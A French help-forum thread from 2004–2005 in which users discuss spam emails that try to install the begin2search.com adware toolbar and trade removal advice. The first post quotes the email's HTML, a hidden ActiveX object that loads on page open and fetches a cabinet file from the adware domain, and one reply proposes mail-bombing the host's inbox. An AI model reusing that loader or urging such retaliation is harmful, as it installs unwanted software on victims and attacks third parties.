Posez votre question Format imprimable Liste des forums Aidez-les Statistiques Rechercher Charte Forum Virus-Sécurité

Mail qui installe la toolbar begin2search.com

Dernière réponse le 16 fév 2005 à 00:02:08 philaz, le 4 sep 2004 à 14:13:38

Signaler ce message aux modérateurs

Bonjour à tous,
j'ai reçu une dizaine de mails essayant de m'installer la toolbar, çà devient pénible !!
Sur le net, www.begin2search.com est même appelé virus...

<html>
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
1252">
<script language=3D"javascript">
function popTool() {
OO.innerHTML =3D '<OBJECT ID=3D"Inst" CLASSID=3D"CLSID:07E9CDF4-20D2-46B1-=
B681-663968F527CE" codebase=3D"http://www.begin2search.com/toolbar/bar/win=
b2s32.cab#Version=3D2,6,0,0" width=3D0 height=3D0><PARAM NAME=3D"ID" VALUE=
=3D"582562"> <PARAM NAME=3D"CAT" VALUE=3D"7"></OBJECT>';
}
</script>
</head>
<body onload=3D"popTool();"> 
<div id=3DOO></div>
<p align=3D"center">
<p><a href=3D"http://www.begin2search.net/now.php"><b>
<font face=3D"Microsoft Sans Serif" size=3D"8">toronto canada</font></a>
</b></p>
<br>
<font color=3D"#FFFFFF">wrestling mexico vacation jewelry</font></a></p>
<OBJECT ID=3D"Inst" CLASSID=3D"CLSID:07E9CDF4-20D2-46B1-B681-663968F527CE"=
codebase=3D"http://www.begin2search.com/toolbar/bar/winb2s32.cab#Version=3D=
2,6,0,0" width=3D0 height=3D0><PARAM NAME=3D"ID" VALUE=3D"582562"> <PARAM =
NAME=3D"CAT" VALUE=3D"7"></OBJECT>
</body>
</html>

J'ai McAfee, ZoneAlarm à jours, updates à jour, etc...
D'après vous, est-ce que je peux aller sur leur site (http://www.begin2search.com) sans risque d'attraper une cochonnerie, histoire de gueuler un peu ??

Des gens comme çà sont la honte de l'Internet, et nous, on n'est pas des moutons...!! ;-))

~~~~~ Eh oui, l'informatique n'est ~~~~~
~~~ qu'une suite de problèmes... ;-) ~~~

Meilleures réponses pour « Mail qui installe la toolbar begin2search.com » dans :

Installation de la messagerie increditmail Voir

Télécharger Windows Live Mail Voir

Toolbar begin2search.com (Résolu) Voir

Désinstaller une Toolbar VoirCertaines Toolbar, ou barres de recherche en Français, s'installent de manière discrète via l'installation d'un autre programme, une simple case à cocher. Cependant, l'entrée dans Ajout/Suppression de programme n'est pas toujours disponible pour...

Configuration de mail pr application Mail Mac Voir

Boite d'envoi Windows Mail Voir

Comment installer un keylogger ? Voir

Télécharger Freecorder Toolbar Voir

Télécharger Multiply Toolbar VoirLe partage de données, notamment de média se fait le plus souvent par Internet. Le plus connu est l'envoie par mail, mais maintenant, il y a plus simple. Multiply Toolbar est une extension Firefox qui vous permet de partager tout type de média avec...

Intranet - Installation du serveur de mail VoirPrésentation de l'installation Le serveur de mail le plus utilisé sous Linux est Sendmail, toutefois celui-ci est très difficile à configurer, ainsi on lui préférera Qmail, un serveur de mail alternatif. Qmail est constitué d'un ensemble de...

Posez votre question Répondre

jess15, le 4 sep 2004 à 16:51:28

Je te conseille de ne pas y'aller tu risque d'etre hijacker
@+++++++++

Répondre à jess15

Cool03, le 4 sep 2004 à 22:51:03

Essayes plutôt de passer A2 puis ad-aware et spybot search&destroy!

çà va venir

Répondre à Cool03

balltrap34, le 5 sep 2004 à 00:55:08

Salut
d accord avec jess a mion d etre bien proteger
gueler ni fera rien

la chasse et le balltrap ma vrai passion
voir site perso dans profil

Répondre à balltrap34

philaz, le 5 sep 2004 à 02:15:43

Merci à tous pour les conseils.

Pour Cool03, lorsque je visualise le mail, l'installation échoue, donc normalement pas de problème;
et OE me met un message :

"les paramêtres de sécurité actuels ne vous permettent pas d'exécuter les
contrôles ActiveX de cette page. En conséquence, cette page ne sera peut-être
pas affichée correctement"

Je n'ai pas non plus la clé désignée dans ma BDR et je n'ai aucune trace de leur fichier winb2s32.cab qu'ils essaient de faire de télécharger dans "Temporary Internet Files"...

~~~~~ Eh oui, l'informatique n'est ~~~~~
~~~ qu'une suite de problèmes... ;-) ~~~

Répondre à philaz

franco, le 5 sep 2004 à 10:57:31

Salut as tous

j'avais le meme probleme quand j'allais sur yahoo.fr le site etait mit automatiquement sur search.com.et le meme pour ma messagerie.

j'avais norton antivirus.

depuit j'ai installer ad aware+spybot sur le site de telecharger.com
et la plus rien tous est parti
comme avant.
en fait t'est victime d'un spyware.
essaye tu veras
a+

Répondre à franco

philaz, le 5 sep 2004 à 12:42:40

Salut Franco,
comme je disais, je ne l'ai pas attrapé, mais il a quand même tenté de s'installer...!!
Et les mails reçus étaient toujours envoyés par des tierces personnes; pour le dernier reçu, de Roumanie, d'où peut-être le fonctionnement assimilable à un virus...

Résultat de l'analyse par SpamRBL

213.159.109.103 (109.103.linkey.ru) est le spammeur (IN) :
Cette IP n'est pas blacklistee (5 spam(s) direct(s)).
213.159.109.103 --> 109.103.linkey.ru --> 213.159.109.103
109.103.linkey.ru est validé
Abuse.net donne : abuse@linkey.ru   postmaster@linkey.ru   support@linkey.ru

J'ai visité leur site www.begin2search.com en passant par le proxy anonymizer... belle boite américaine, qui prétend vendre des solutions anti-spyware et autres ... foutage de gueule !!!
Dans le cas présent, la CNIL ne peut rien faire, et ils conseillent de signaler à http://www.ftc.gov/bcp/conline/edcams/spam/index.html
Tiens, si j'habitais aux USA, je leur collerais un procès.

Et que prévoit la LCEN pour çà ????? rien... "reçois les virus et ferme-la..." :-((

~~~~~ Eh oui, l'informatique n'est ~~~~~
~~~ qu'une suite de problèmes... ;-) ~~~

Répondre à philaz

marcdu51, le 13 oct 2004 à 18:50:42

Salut a tous
oui moi aussi j'ai chopé la toolbar begin2search.com et impossible de la virée.
en plus ça met en surbrillance certains mots ou partie de mots (spam, virus,visa,sex,...) integrant un lien quand je consulte les pages web et dans la messagerie.
pour finir ça m'ouvre des pages tout seul et installe sur le bureau des raccourcis des sites contenus ds la toolbar.
alors si qquelqu'un a une solution pour me debarraser de tout ça j'en serai tres reconnaissant
j'ai essaye d'installer ad aware mais ça m'a bloque internet explorer.
je sais ça fait beaucoup de problemes mais je debute et peu d'experience soyez indulgent

Répondre à marcdu51

Ian, le 31 déc 2004 à 19:20:07

Salut,
moi je pense que tu devrais laisser tomber internet explorer, et te mettre sur mozilla firefox, tu ne chopperas pas de merdes.
Moi aussi j'ai la même chose que toi avec internet explorer, les mots en surbrillance, les raccourcis sur le bureau, et maintenant IE m'envoie un rapport d'erreur quand je l'ouvre. Ca fout vraiment la merde, et en plus je ne sais pas comment je l'ai attrappée !
En tout cas je te reconseille de te mettre sur mozilla firefox et crois moi, t'auras plus aucune merde, et plus besoin de ad aware.
Bonne chance quand même à ta poursuite d'éradication de cette pu**in de barre.

Répondre à Ian

jess15, le 13 oct 2004 à 19:38:25

Salut telecharge :

(spy bot)
http://spybot.dalnet.com.fr/spybotsd13.exe

(adware SE)
http://www.ordi-netfr.org/adawarese.html

(CWshredder)
http://www.soft32.com/download_19014.html

pour ce dernier faut absolument fermer tout les programe y compris internet explorer et donc hors connexion ensuite faire fix next next

telecharge cette antitrojan
http://www.emsisoft.net/fr/

pense a les mettre a jour avant de les lance
ensuite tu nous dit ce que ca donne

ensuite suprimez les fichier inutiles
demarrer/paneau de configuration/option internet/suprimer fichier temporaaire apres une petite fentre s'ouvre tu coche "suprimer tout le contenu hors connexion" suprime aussi les cookies et efface l'historique

redemare ...
si le probleme persiste faite un scan avec hijackthis
http://telechargement.zebulon.fr/138-HijackThis-1.98.2.html (nouvelle version )

ensuite faire scan/save log et coller le resultat ici

@++

Répondre à jess15

jean, le 9 nov 2004 à 18:29:00

Les crapules à l'origine de ce merdier sont des russes de la société Linkey.ru basée à saint petersbourg et dont les serveurs sont hostés à san jose en californie.

il faudrait préparer une action massive (mondiale car tout le monde etouffe de leur conneries) en bombardant leur boite au lettre de mails avec de lourd attachement afin de les bloquer et leur renvoyer la monnaie. ces gens ne respectent rien et sont de véritables criminels. une petite société à vu ses 10 machines bloquées pendant 48 heures a couse de leur prtaiques de voyous

jean

---------DETAILS --------------

inetnum: 213.159.96.0 - 213.159.127.255
org: ORG-LL4-RIPE
admin-c: LNA1-RIPE
tech-c: LNA1-RIPE
netname: RU-LINKEY-20021010
descr: PROVIDER
descr: Linkey Ltd
country: RU
status: ALLOCATED PA
notify: noc@linkey.ru
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: LINKEY-MNT
mnt-routes: LINKEY-MNT
changed: hostmaster@ripe.net 20021010
changed: hostmaster@ripe.net 20040203
changed: hostmaster@ripe.net 20040602
source: RIPE

inetnum: 213.159.117.0 - 213.159.118.255
netname: HISTHOST-BIZ-NET
descr: HISTHOST
country: RU
admin-c: LNA1-RIPE
tech-c: JH-ORG
tech-c: LNA1-RIPE
status: ASSIGNED PA
notify: noc@linkey.ru
mnt-by: LINKEY-MNT
changed: s.bondar@linkey.ru 20041029
source: RIPE

URL à éviter = 231.159.117.134 (surtout ne pas cliquer !!!)

san jose , CA

http://www.ripe.net/membership/indices/data/ru.linkey.html

Linkey Ltd
Linkey ITSP
Malaja Morskaja str 11, apt 216
Saint-Petersburg ,191186
Russia
phone: +7 812 3157505
fax-no: +7 812 3157343
e-mail: noc@linkey.ru
Areas serviced: RU
This registry has the RIPE NCC contribution category: Small
Its RIPE NCC Association Membership status is: Full

Répondre à jean

philaz, le 10 nov 2004 à 12:21:14

Tout à fait, c'est une honte. Je ne comprend même pas qu'on leur autorise d'avoir un nom de domaine !!!
Et puis ils peuvent toujours prétendre qu'ils ne sont pour rien dans l'envoi des mails contenant leur "virus"... C'est çà, l'Amérique :-((

PS: je croyais que ".ru" était pour la Roumanie... excusez-moi, les roumains ;-)

~~~~~ Eh oui, l'informatique n'est ~~~~~
~~~ qu'une suite de problèmes... ;-) ~~~

Répondre à philaz

gdidier2, le 26 nov 2004 à 01:12:01

Moi je lai desisntallez mais il me reste les phrases en surbrillance et je n arrive pas desinstaller localNRD.dll avec norton ou xp.
comment oter les deux??? je veux mon IE comme avant.

Répondre à gdidier2

jess15, le 26 nov 2004 à 19:40:20

Salut telecharge c anti spywares
(spy bot)
http://spybot.dalnet.com.fr/spybotsd13.exe

(adware SE)
http://telecharger.01net.com/windows/Internet/internet_utlitaire/fiches/25543.html
http://www.ordi-netfr.org/adawarese.html

(CWshredder)
http://www.soft32.com/download_19014.html

pour ce dernier faut absolument fermer tout les programe y compris internet explorer et donc hors connexion ensuite faire fix next next

(spy sweeper )
http://www.zdnet.fr/telecharger/windows/fiche/0,39021313,11010914s,00.htm

telecharge cette antitrojan
http://www.emsisoft.net/fr/

pense a les mettre a jour avant de les lancer

ensuite suprimez les fichier inutiles
demarrer/paneau de configuration/option internet/suprimer fichier temporaaire apres une petite fentre s'ouvre tu coche "suprimer tout le contenu hors connexion" suprime aussi les cookies et efface l'historique

redemare ...
si le probleme persiste faite un scan avec hijackthis
http://telechargement.zebulon.fr/138-HijackThis-1.98.2.html (nouvelle version )

ensuite faire scan/save log et coller le resultat ici
@+++++++

Répondre à jess15

encore une gogo, le 27 nov 2004 à 19:37:56

Bonjour à tous
moi aussi j'ai chopé la barre begin2 , je suis sous xp home , IE , j'ai suivi tous les conseils et n'arrive pas à m'en débarrasser, que celui qui à reussi me réponde sur ce forum , pleaaaase, grand merci à lui et à tous

Répondre à encore une gogo

bernie61, le 27 nov 2004 à 20:15:51

Salut
comme dit Jess15 en dernier recours il y a HijackThis
Tu charges HijackThis là :
HijackThis direct download: http://209.133.47.12/~merijn/files/HijackThis.exe
Ou là
http://www.spychecker.com/download/download_hijackthis.html
tu le lances et sauves le fichier log que tu copie/colle ici
ou bien tu le mets là
http://hijackthis.de/fr
et tu examines quels fichiers sont notés suspects : ceux en rouge tu peux faire cocher puis FIX sans problème, ceux en orange sont suspects tu dois vérifier avec google quel genre de pgm c’est : bon/mauvais

a+

Répondre à bernie61

frederique alias gogo, le 30 nov 2004 à 01:52:51

Bonsoir bernie
merci de ta réponse rapide, j'ai essayé hitjack sans succès, il est 2h du matin!!! de guerre lasse,, j'ai tapé begin2 sur google, je suis tombée sur le site begin2.com , j'ai osé cliquer et recliquer sur recherche begin et suis tombée sur desinstall, c'est fait. ouf!!!!, en fait ils se veulent etre un espece de catalogue de telechargements et moteur d recherche à la fois, enfin à signaler aux autres , c'est plus simples que de scanner avec tous les anti spy de la creation, et merci encore à toi et aux autres en general pour leur bonne volonté et leur patience

Répondre à frederique alias gogo

Ian, le 22 déc 2004 à 00:10:27

Alors moi aussi j'ai choppé la begin2search.com bar, elle s'est installée uniquement dans internet explorer, et je ne sais comment ( ce n'est pas par un mail ). A chaque fois que j'ouvre IE il y a au moins 3-4 pages de pubs et de cul qui s'ouvrent... Jusqu'au jour où j'ai compris qu'avec mozilla firefox on ne choppait pas de merdes ! Et oui quand je l'ouvre, pas de pops-ups ! Magique ! En revanche je ne sais pas comment la désinstaller cette barre non-plus.
Prenez mozilla firefox, et vous verrez que vous n'aurez plus besoin de zone alarm, hijack-this, anti-adwares, spywares et compagnie.
Voilà
A bientôt pour de nouvelles merdes :-)

Répondre à Ian

Devliegher freddy, le 5 fév 2005 à 13:07:44

OOOO

Répondre à Devliegher freddy

jp01, le 15 fév 2005 à 18:03:49

J ai reussi a enlevere cette merde grace a ca

http://www.symantec.fr/avcenter/venc/data/adware.begin2search.html

bon courrage

Répondre à jp01

philaz, le 16 fév 2005 à 00:02:08

Bonsoir JP,
super, merci beaucoup pour l'info... ;-)

~~~~~ Eh oui, l'informatique n'est ~~~~~
~~~ qu'une suite de problèmes... ;-) ~~~

Répondre à philaz

Posez votre question Répondre